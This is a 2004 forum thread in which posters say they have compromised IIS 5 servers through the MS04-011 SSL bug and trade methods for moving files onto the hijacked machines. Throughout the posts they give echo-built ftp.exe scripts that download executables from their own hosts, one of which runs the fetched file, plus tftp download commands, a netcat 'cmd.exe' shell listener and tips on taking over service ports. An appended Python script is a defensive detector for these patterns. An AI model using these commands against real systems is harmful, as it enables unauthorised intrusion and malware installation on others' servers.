psykotikpenguin
Has anyone managed to exploit any machines with the IIS 5 SSL bug and use FTP.exe? I've managed to get about a dozen shells so far but I can't get FTP.exe to work for a single one of them. I've tried to connect to about three different FTP servers but all of them hang when it starts to transfer. Has anyone managed to get this to work? And if so, could you please post your "echo" text?

Here's what I'm using at the moment:

echo open xx.xx.xx.xx 1050 > c:\f2p.txt
echo user leech >> c:\f2p.txt
echo l33ch >> c:\f2p.txt
echo type binary >> c:\f2p.txt
echo get filename.exe >> c:\f2p.txt
echo quit >> c:\f2p.txt

ftp -v -n -s:c:\f2p.txt

Thanks for any help.
_ET_
Well.. I haven't used ftp yet... coz TFTP works fine for me.

But here's the code I would use:

CODE
echo open 192.168.0.1 >> temp
echo user dingdong dingdong >> temp
echo bin >> temp
echo get server.exe >> temp
echo bye >> temp
ftp -n -s:temp
erase temp


lv4
psykotikpenguin:

Can You tell us which exploit (compiled by who) do You use and what OS are You running??

Thank You
daguilar01
have you tried having them connect to another ftp?, maybe the one you are trying is having problems
tweakz20
exploit in use in discussion would be "Microsoft IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011)" and was posted in http://www.governmentsecurity.org/forum/in...?showtopic=7934 by gurou (maybe more places)... (compiled version isn't in that one, just source)

yeah, try out a different ftp client.. I didn't try ftp with it, but the problem definitely sounds like a software problem if other clients work fine with it...


psykotikpenguin
Thanks for your help guys. I'm using Windows XP and the second reverse connection THC exploit. I've already tried about three different FTP servers (all of them are Serv-U based though -- I'll try a different kind of server later on tonight.) Tweakz20, I only have access to a default shell so I don't think I can use any other FTP clients. I don't think there are any other FTP programs built into windows by default aside from FTP.exe.
Joc00
Well U have got farther than me then hehe. I haven't even seen a shell yet. Testing over my network now to see what's up. Tried both versions today.

tftp slow but always good 2 incase

tftp -i ip get file.bat c:\file.bat
blahplok
how use THCIISSlame.exe exploit????
anybody can help me??
my ISP is block all port, and allow only port 21, 23, 53, 80, 443... how can i use this exploit????
i've try THC.exe blah.com 202.25.223.2 53
...
..
..
waiting for shell...

and when i open other cmd shell and type

nc.exe -l -p 53 -e cmd.exe -vv
...
...
no shell.....

help me please...
t00sTr0nG
I scanned port 80 and test the exploit, but i don't get a shell!
Is port 80 the right port?
t00sTr0nG
Meteor
no i think it's port 443!
Acid Burn
of course it's 443 ssl is default set 2 443
misa
I've tried a lot of machines, all stop at "waiting for shell"
usch
pls don't talk about how the exploit works. u can discuss it in the exploit specific topics, but not here.

thank u very much
-Arthy-
If it takes too long to transfer a file a shell could crash, yeah.
btw, a shell can always stop whenever it wants.

I cannot imagine ftp.exe not working, I just think your shell just stops every time. Maybe it has something to do with the connection to the server.
CODE

echo open [host] [port]>msg.txt
echo user [login] >>msg.txt
echo [pass]>>msg.txt
echo type binary>>msg.txt
echo get [file.exe]>>msg.txt
echo quit>>msg.txt
ftp -i -n -v -s:msg.txt


Although I use ftp.exe as a last option.
The chance of losing a shell with .vbs, tftp or rcp is a lot less!

You can find a good .vbs scripts on the board here.
Eyeless
I have the same problem with this sploit... If I try to FTP it connects and asks for user upon entering it never prompts for pass.. And if I try to ADD a user shell crashes...WTF? And where the hell is this VB script I been looking everywhere.
Try tftp, it werks... But not very anonymous...
psykotikpenguin
I've finally got it to work on some anonymous pub somewhere. I guess the problem was just with Serv-U based FTPs...
porc1978
I've got a little problem....when i send the exploit it gave to me a bind error 10048....Someone know what does it mean?
G777
QUOTE (t00sTr0nG @ Apr 23 2004, 09:45 AM)
I scanned port 80 and test the exploit, but i don't get a shell!
Is port 80 the right port?
t00sTr0nG

try using my auto hacker
it has a built in scan1000 which automatically scans for the correct port which is port 443 btw

if you have probs ftp`ing your files maybe the ftp.exe has been disabled on the remote pute
try using the bat file posted around here that echoes the code into a bat file to make a new ftp.exe,
I haven't tested it but I hear it works great
Toxi
Anyone got this ftp transfer working?
I have same probs like many other guy with ftp. Hmm but tftp is working...
labbertasche
sometimes it works, sometimes not

I would tracert a route to the ftp, perhaps you'll see the problem

"tracert 208.x.x.x"

or you take another method to transfer the files ... look into the board ( ... to get a file from a webserver ... )

greets
labbertasche
HAnzsz
omg dudes,

IT is known that iis 5.0 sploit gives many internal ip results

that means its in a network

which means the sysadmin didn't route the "ftp" transfer ports

which means you can NEVER ... never ever ever ever... ever EVER transfer files on it WITH FTP.exe

with tftp.exe it IS possible in many cases.
but also not always.
b/c tftp uses other protocol.


hope this helps.
fre4k
QUOTE (HAnzsz @ Apr 27 2004, 09:50 AM)
omg dudes,

IT is known that iis 5.0 sploit gives many internal ip results

that means its in a network

which means the sysadmin didn't route the "ftp" transfer ports

which means you can NEVER ... never ever ever ever... ever EVER transfer files on it WITH FTP.exe

with tftp.exe it IS possible in many cases.
but also not always.
b/c tftp uses other protocol.


hope this helps.

THATS WRONG !

I have many, really many shells with the ssl_update exploit and to get files via FTP.exe on the target is not the problem! I haven't had a problem yet! The only problem is the Firewall ...

-fre4k
-Arthy-
For the people that still can't find the .vbs script ...
http://www.governmentsecurity.org/forum/in...?showtopic=4649

have fun, and never ask again
rpm
Thanks a lot man, needed it
polpotx
I don't know if this has much to do with this topic but .. I tried the exploit recently released for the framework, from metasploit.com, and I didn't get any results ... does anyone use this exploit too?

Best Regards
DougieShiney
that metasploit includes extra offsets so should work a lot better, I've had a fair few shells with this but the problem being when u run ur program it will listen on the internal network, I'm guessing to overcome this you can do two things, close all av/firewall software, secondly close a service already open try that port... try the following ports, 21,25,110,53

21, ftp port
25, smtp port
110, smtp port
53, dns port

also remember if ICF is running close it.. very important this as it will block your connection... Other than that .. ideas up to u lot how to get your ftp client or whatever ur doing to work..

I'm going to test some other ftp clients later on my test machine i have locally... see what results i get..
polpotx
Well .. I have no firewalls ... and no AV's ... I have my system updated .. with all recent ms patches. I have my internet connection through pppoe though .. could this be a problem? How can I resolve it .. I also got a problem from THCiis .. it's like .. I attacked one IP and it failed .. I gave it to a friend of mine and he got a shell in no time. I tried again and again but with no success .. on a sure target.
You said something I didn't quite understand:

QUOTE
secondly close a service already open try that port... try the following ports, 21,25,110,53


As in ... set the listen port for the exploit on one of those service ports?

Best regards
mamep
if u close some of these services and install your service @ the same port to bypass the router it will be noticed soon....
And it will be cleaned up
JohnAcres
I've successfully used ftp to get some files, I don't understand why everyone is having so much trouble. I didn't notice anything different about it other than when I was echoing it was telling me that I had an invalid character in the username, so I just got rid of the space between the username and the >> whatever.txt, for example,

username>> whatever.txt instead of username >> whatever.txt and I did the same with the password just as a precaution
tianzhen
QUOTE (psykotikpenguin @ Apr 23 2004, 08:35 AM)
Has anyone managed to exploit any machines with the IIS 5 SSL bug and use FTP.exe? I've managed to get about a dozen shells so far but I can't get FTP.exe to work for a single one of them. I've tried to connect to about three different FTP servers but all of them hang when it starts to transfer. Has anyone managed to get this to work? And if so, could you please post your "echo" text?

Here's what I'm using at the moment:

echo open xx.xx.xx.xx 1050 > c:\f2p.txt
echo user leech >> c:\f2p.txt
echo l33ch >> c:\f2p.txt
echo type binary >> c:\f2p.txt
echo get filename.exe >> c:\f2p.txt
echo quit >> c:\f2p.txt

ftp -v -n -s:c:\f2p.txt

Thanks for any help.

the same prob with me until i change the code to this:

CODE
echo echo open 666.555.30.107 21^>tmp>tmp.bat
echo echo test^>^>tmp>>tmp.bat
echo echo test^>^>tmp>>tmp.bat
echo echo binary^>^>tmp>>tmp.bat
echo echo get test.exe^>^>tmp>>tmp.bat
echo echo bye^>^>tmp>>tmp.bat
echo ftp -i -n -v -s:tmp>>tmp.bat
echo del tmp>>tmp.bat
echo test.exe>>tmp.bat
tmp.bat
o0oKARo0o
had the same problem but if you check the open ports and then stop the service on one of the ports and use it for your ftp, it will work fine, ports 21 and 23 work almost all the time for me..
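
Added example, not part of any post in this thread: a defender-side detection sketch for the transfer pattern the posts describe (an FTP command script written line by line with `echo` redirection and then run with `ftp -s:`, plus `tftp -i ... get`). The `(session, command line)` record shape, the rule names and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample: (session id, command line) records from a hypothetical
# shell-command audit source. Addresses are documentation ranges.
SAMPLE_EVENTS = [
    (4120, r'echo open 192.0.2.10 1050 > c:\f2p.txt'),
    (4120, r'echo user leech >> c:\f2p.txt'),
    (4120, r'echo get filename.exe >> c:\f2p.txt'),
    (4120, r'ftp -v -n -s:c:\f2p.txt'),
    (4120, r'tftp -i 192.0.2.10 get file.bat c:\file.bat'),
    (5300, r'echo build finished >> c:\logs\build.txt'),  # benign echo
    (5300, r'ftp -s:c:\ops\nightly.txt'),                 # pre-existing script
]

# echo <ftp verb> ... > file   or   echo <ftp verb> ... >> file
ECHO_RE = re.compile(
    r'^\s*echo\s+(open|user|get|put|bin|binary|type)\b.*?>{1,2}\s*([^\s>]+)\s*$',
    re.I)
# ftp.exe driven by a command script (-s:file); \b keeps "tftp" from matching
FTP_RE = re.compile(r'\bftp(?:\.exe)?\s.*?-s:(\S+)', re.I)
# tftp binary-mode download: tftp -i <host> get <file>
TFTP_RE = re.compile(r'\btftp(?:\.exe)?\s+-i\s+(\S+)\s+get\s+(\S+)', re.I)


def detect(events):
    """Return (session, rule, detail) alerts for scripted download behaviour."""
    written = defaultdict(lambda: defaultdict(set))  # session -> file -> verbs
    alerts = []
    for session, cmd in events:
        m = ECHO_RE.match(cmd)
        if m:
            written[session][m.group(2).lower()].add(m.group(1).lower())
            continue
        m = FTP_RE.search(cmd)
        if m:
            verbs = written[session].get(m.group(1).lower(), set())
            # Alert only when the same session echoed both a connect and a
            # transfer verb into the script that ftp is now asked to run.
            if {"open", "get"} <= verbs:
                alerts.append((session, "ftp_script_built_inline", m.group(1)))
            continue
        m = TFTP_RE.search(cmd)
        if m:
            alerts.append((session, "tftp_binary_get", f"{m.group(1)} {m.group(2)}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Session 5300 produces no alert because its script file was not built by `echo` in the same session, which keeps routine scheduled `ftp -s:` jobs out of the results.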